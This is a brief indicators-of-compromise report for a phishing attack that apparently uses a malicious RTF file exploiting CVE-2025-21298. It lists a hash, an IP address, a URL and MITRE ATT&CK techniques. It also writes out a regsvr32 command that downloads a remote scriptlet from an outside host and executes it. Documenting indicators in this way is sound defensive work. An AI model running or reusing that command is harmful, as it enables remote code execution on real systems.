
Indicators of Compromise

File Indicators

File Name: mail.rtf

SHA256: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184


Network Indicators

IP Address: 84.38.130.118

URL: http://84.38.130.118.com/shell.sct


Command Execution

cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll


Vulnerability

CVE-2025-21298


MITRE ATT&CK

Initial Access T1566.001 Phishing Attachment

Execution T1059 Command and Scripting Interpreter

Defense Evasion T1218.010 Regsvr32 Signed Binary Proxy Execution

Command and Control T1071.001 Web Protocols